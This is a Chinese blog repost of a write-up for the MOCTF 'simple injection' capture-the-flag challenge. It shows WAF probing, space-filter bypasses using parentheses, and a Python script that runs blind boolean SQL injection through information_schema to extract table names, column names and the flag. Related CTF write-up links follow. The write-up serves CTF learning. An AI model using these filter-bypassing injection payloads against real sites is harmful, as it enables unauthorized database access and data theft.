MOCTF 简单注入

最新推荐文章于 2024-11-13 22:17:16 发布
最新推荐文章于 2024-11-13 22:17:16 发布
阅读量85 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/zaqzzz/p/10053508.html
版权

最近在练习sql注入写脚本,记录一下思路,刚学的and 1=1也拿出来溜溜

http://119.23.73.3:5004/?id=1

首先,没有被过滤是正常显示。  
没有被过滤但是查询不到就是空白,比如?id=99999
waf过滤关键词,提示whatfuck

我首先判断的是有没有用trim()函数,要知道trim函数和过滤是不一样的。

区别很简单,举个例子。trim默认移除字符串左右两边的空格

 http://119.23.73.3:5004/?id=1(此处1后边有空格)
 如果使用了trim()函数,也过滤掉了空格。
 那么这个不会出waf的,而是会正常显示id=1的内容。
 会让你以为空格并没有过滤,是因为trim函数把空格去掉后才用waf函数进行的判断。

测试的方法很简单?id=1 1,让空格在里面就好了。

发现过滤了空格,寻找能够代替空格的字符。

%20 %09 %0a %0b %0c %0d %a0 %00 /**/    ()

发现只有()没有被过滤。

判断是整形注入还是字符型注入,?id=1-0,发现不是id=1的界面,不是整形注入

判断id的保护是什么?首先猜测是引号,输入1'1,(这里为了排除trim函数的影响),发现没有出现waf,但是会出现空白。所以是单引号保护,因为单引号没有被过滤,会匹配原来保护id的两个单引号的前一个,导致了有一了孤零零的单引号没有人和他配对,就会出错,什么也查不出来。

判断截断字符有没有被过滤,发现尝试%23,--+,--%20都会被过滤。

所以考虑and '1这样绕过,匹配最后的那个',不让他孤零零,有任何他匹配就不会出错。

判断其他的过滤字符

union被过滤,无法使用联合查询
> < like regexp被过滤,但是=没有被过滤,between and 也没有被过滤。  
or被过滤,information这个一会再说,有点特殊。  
mid,ascii没有被过滤,逗号也没有被过滤。

判断逻辑

http://119.23.73.3:5004/?id=1%27and(select(0))and%271
http://119.23.73.3:5004/?id=1%27and(select(1))and%271

发现可以判断出来注入的逻辑,只要构造语句让select(0)和select(1)里面的1,0值出现就可以判断了。

脚本,py3

import requests

shiliu="0x20"
zuihou="0x7f"
i=1
while True:
    #http://119.23.73.3:5004/?id=1%27and(select(mid((select(database())),1,1))=%27m%27)and%271 #MOCTF
    #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='moctf')between("+shiliu+")and(0x7f))and%271"  #DO_Y0U_L1KE_LONG_T4BLE_NAME,NEWS
    #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(column_name))from(information_schema.columns)where(table_name)='do_y0u_l1ke_long_t4ble_name')between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
    url="http://119.23.73.3:5004/?id=1%27and(select(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),"+str(i)+",1)))between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
    res=requests.get(url)
    #print(url)


#MOCTF{B1IND_SQL_1NJECTI0N_G0OD}

    if "Hello" not in res.text:
        i+=1
        x=hex(int(shiliu,16)-1)
        if '20' in x:
            break;
        print(x)
        zuihou = shiliu + zuihou.replace("0x","")



        shiliu="0x20"
        #shiliu=x+shiliu.replace("0x","")   #跑前三个的时候这个不能注释掉,跑最后一个得注释掉



    shiliu=str(hex(int(shiliu,16)+1))

数据库我是手动测试的,是moctf,然后剩下的,一开始偷了懒,没用ascii跑,结果flag大小写都提交不上,原因是flag有大写也有小写,数据库是对大小写不敏感的,用ascii就可以了

第一个语句我没用脚本跑,自己用手试出来的。

moctf{b1ind_SQL_1njecti0n_g0od}  
兄弟们不会做的就问啊,输出一下url,挨个看看怎么跑的,直接提交flag没啥用

最后说一下那个or被过滤了,为什么information没有被过滤。

information确实被过滤了,但是information只要加上其他为被过滤的字符,也不会被过滤。

为此还去群里问了下,

出题人:Waf加了智能识别语义,information语境就不过滤,这样听起来会不会更牛逼

转载于:https://www.cnblogs.com/zaqzzz/p/10053508.html

weixin_30908649
关注
MOCTF_misc
LittleKeKe的博客
04-03 506
我是小萌新在成长,希望遇到更多大佬 平台: http://www.moctf.com/challenges 由于我自己是个萌新,所以一方面写下来记住,一方面写给更加萌新的萌新,哈哈哈 这里少两题:百变flag、奇怪的01 参考一个博主的: https://blog.csdn.net/weixin_34050389/article/details/88208331 我可是黑客 图片另存为本地,用W...
MOCTF crypto 密码学 writeup
qq_41358038的博客
03-14 824
MOCTF crypto 密码学(持续更新)1.数据库密码2.rot 大法好3.奇怪汉字4.就是这个feel 1.数据库密码 D8EA7326E6EC5916ACCD6E0C9D264C63 涉及到数据库,猜到是md5,但没想到是要把0-9,A-F 之外的字母删掉再md5解密。 还是对md5了解不够 MD5编码: 要么全为大写,要么全为小写 字符数量16/32 MD5的取值范围是0~9 a~f ...
Moctf---简单注入
03-21 124
因为比较菜诶,所以这道题的命令让我拼接了好久。记录在此 放出url =http://119.23.73.3:5004/ 打开后我们在后面写?id=1既--> 当我们输入的信息有误后,页面就没有回显了。 所以我们得到,当命令正确之后,会有hello的回显。 我们在尝试一下,发现他给ban了空格、sub、>等等。但是我们发现其他一些基础的命令没有给ban,比如...
MOCTF——misc
team39的博客
04-20 320
第一题:我可是黑客 将图片保存至电脑,然后用 记事本 或 notepad++(很好用的工具)打开,在文档的最后发现moctf{e4sy_1ma9e_m1sc}。 第二题:假装安全 用notepad++打开,发现,有一个flag.txt 。 用kali虚拟机打开,用binwalk工具分离。 打开分离文件...
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
UMCTF2021-编写 MOCSCTF主持的UMCTF2021的文章 欢迎加入我们: 欢迎加入我们的行列: CTF时间: ://ctftime.org/team/120747 面子书: : 感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF bluebear @ MOCTF RB916120 @ MOCTF molamola @ MOCTF Allon @ MOCTF T4rn @ MOCTF P0tato @ 20级茯苓@ 20级wyjbot @ 20级Mark0519 @ 20级aYoung @ 20级Ch4rc0al @ 20级詹姆斯@20级 类别 挑战 关联 加密货币 婴儿RSA 加密货币 caesars_army 加密货币 最佳素 加密货币 WII 加密货币 维吉内尔 加密货币 Feistel1 法证 笔记 法证 要求 法证 拨
CTF-Write-UP
03-09
UMCTF竞赛Noob的Hackathon公开组 其他-UMCTF2021-Macow 写信作者: Louis Lou 标志: MOCSCTF {1_4m_l1v1n6_1n_534c_p41_v4n_p4rk_n0w ....} 问题: 港澳作者:RB916120 你还记得喵吗? 文件标志 写上去: 首先解压缩文件,然后利用IDE编辑器搜索“ CTF”,另一部分通过搜索“}”找到。
MOCTF-WEB-writeup
baochigu0818的博客
08-02 732
MOCTF-WEB-writeup 好菜,除了简单的几个题,自己会做,难的都是看老大WP完成的,太菜了 啥姿势都不会,就此记录一下,供日后查看及反省。菜鸡的自我修养 0x01 一道水题 题目链接:http://119.23.73.3:5001/web1/ 直接F12了解一下,get flag:moctf{easy_source_code} 0x02 还是水...
MOCTF
weixin_30825199的博客
05-03 662
花了几个小时做了一下moctf,整理了几个当时没做出来的题 unset <?php highlight_file('index.php'); function waf($a){ foreach($a as $key => $value){ if(preg_match('/flag/i',$key)){ exit('are yo...
webug4.0——注入
A_dmin的博客
09-09 2720
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
MOCTF-WRITE-UP(二)
郁离歌丶的博客
03-14 1461
MOCTF-WRITE-UP(二)WEBFlag在哪?question:flag到底在哪!Hint1: 跟一首歌有关。Hint2: PPAPanswer:其实一道脑洞题,burp抓包即可看到302跳转12345where is flag!I have a flagI have a frog!ah~ guess where is flag!There is no flag!23333典型的PPAP,...
MOCTF - WriteUp
dbwuawuuq822801895的博客
11-17 170
最新更新已转移至个人博客http://rasang.site 1.一道水题 题如其名,查看源代码就可以看到flag 2.还是水题 尝试输入,发现输入失败,于是F12直接修改数据 直接删除disabled,修改长度为5 3.访问限制 很简单,使用tamper data修改firefox为NAIVE就可访问flag 4.机器蛇 直接进入源代码,发现下面有个提示,进入robots....
简单记录一下MOCTF的三道web题
0verWatch的博客
03-06 3705
本人渣渣,于是记录一下 死亡退出 一道代码审计题目 &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
MOCTF misc
ChanCherry的博客
08-16 266
0x00 假装安全 题目给了一个carefully.jpg,用记事本打开发现有flag.txt,于是binwalk一下, 果然,里面有个zip,其中有个flag.txt,binwalk -e carefully.jpg解压一下,得到一个压缩包和flag.txt,打开flag.txt就可以看到一串像是flag的东西: mcfCrflyS1eot{@eul_ld} 栅栏密码解密,即可得到moctf{...
MOCTF(网站扫描器)
Mikasa
05-03 469
试了好多遍还事没做出来,于是只能看wp了0.0 首先会有一个提示: 不太清楚什么意思。进入地址后发现: 只是提供了一个提交框,没发现什么。。试了扫描一下有没有源码泄露…没有结果 于是试试提交一个几个数据。。。发现只能提交关于http://www.moctf.com的。。。 但是会返回关于网址的信息。。 这时候又想是不是命令执行的漏洞在之间加了&&和||都没用。。。。后来只能去...
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
超哥的博客
11-09 1284
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
随堂测微信小程序ssm+论文源码调试讲解
u014445459的博客
11-11 944
微信小程序,简称小程序,英文名Mini Program,是一种全新的连接用户与服务的方式,可以快速访问、快速传播,并具有良好的使用体验。小程序的主要开发语言是JavaScript,它与普通web的开发有很多相似之处。小程序和普通网页开发并不是相同的东西,是有差异的。网页开发的渲染线程和脚本线程是互斥的,而在小程序中,确实分开的,分别在不同的线程之中运行。
数据库和云服务器哪个便宜一些?
petaexpress的博客
11-12 326
云服务器的价格区间相对更广泛,因为用户可以根据实际需求选择不同配置和性能的服务器。而云数据库的价格则更多地依赖于数据库类型和规格。在相同配置下,云服务器的价格可能会略低于云数据库,但这并不是绝对的,因为两者都有不同的优惠政策和计费方式。
约束(MYSQL)
最新发布
2301_80363309的博客
11-13 162
not null(非空) unique(唯一) default(默认约束,规定值) 主键约束primary key(非空且唯一) auto_increment(自增类型) 复合主键 check(保证列中值符合指定条件) foreign key(外键约束)
labview中连接sql server数据库查询语句
weixin_70653117的博客
11-13 212
日常记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值